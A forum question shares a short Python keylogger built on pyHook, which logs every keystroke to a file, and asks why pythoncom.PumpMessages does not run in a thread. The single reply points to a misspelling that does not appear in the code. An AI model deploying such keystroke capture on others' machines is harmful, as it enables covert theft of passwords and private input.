# pythoncom.Pumpmessages in python

Tags: python, multithreading, pyhook, pythoncom

I'm writing little keylogger in python. Here is my code.

```
LOG_FILENAME = 'keylog.txt'

def OnKeyboardEvent(event):
    logging.basicConfig(filename=LOG_FILENAME,
                        level=logging.DEBUG,
                        format='%(message)sx')
    logging.log(10,chr(event.Ascii))
    return True

def print_stuff():
    print "Oh stuff!" 
hm=pyHook.HookManager()  
hm.KeyDown = OnKeyboardEvent  
hm.HookKeyboard()  
thread.start_new_thread(pythoncom.PumpMessages,()) 
print_stuff()
```

but why `pythoncom.PumpMessages()` is not working? is there any way to run pythoncom.PumpMessages function in thread?

Answer (score 1):

Maybe because you misspelled PumpMessages()